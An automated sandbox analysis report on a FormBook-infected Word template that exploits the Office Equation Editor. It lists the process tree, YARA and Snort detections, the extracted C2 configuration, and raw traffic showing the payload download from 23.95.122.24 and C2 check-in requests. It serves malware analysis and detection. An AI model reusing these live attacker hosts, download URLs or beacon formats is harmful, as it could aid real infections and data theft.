Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report dot.dot

Overview

General Information

Sample Name:dot.dot
Analysis ID:383958
MD5:40f03856876fda8b3bda880d1d5a4636
SHA1:d252c054154c5524dfbf3f3238b32f711290fd36
SHA256:a4358b898c41852211ee727e4b8c0d05301bf4c6a90a4780c5a6f8b1b1cf5c81
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2504 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2616 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
      • vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2820 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2700 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2936 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.1.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.1.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.scott-re.online/nnmd/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted fileShow sources
          Source: dot.dotVirustotal: Detection: 43%Perma Link
          Source: dot.dotReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp
          Source: global trafficDNS query: name: www.likehowto.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.scott-re.online/nnmd/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 11:09:09 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 04:59:44 GMTETag: "5e800-5bf6eea6ef000"Accept-Ranges: bytesContent-Length: 387072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.7985699.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.142.156.44 45.142.156.44
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: global trafficHTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: C:\Windows\explorer.exeCode function: 6_2_02956302 getaddrinfo,setsockopt,recv,6_2_02956302
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555C4A64-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.7985699.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.likehowto.com
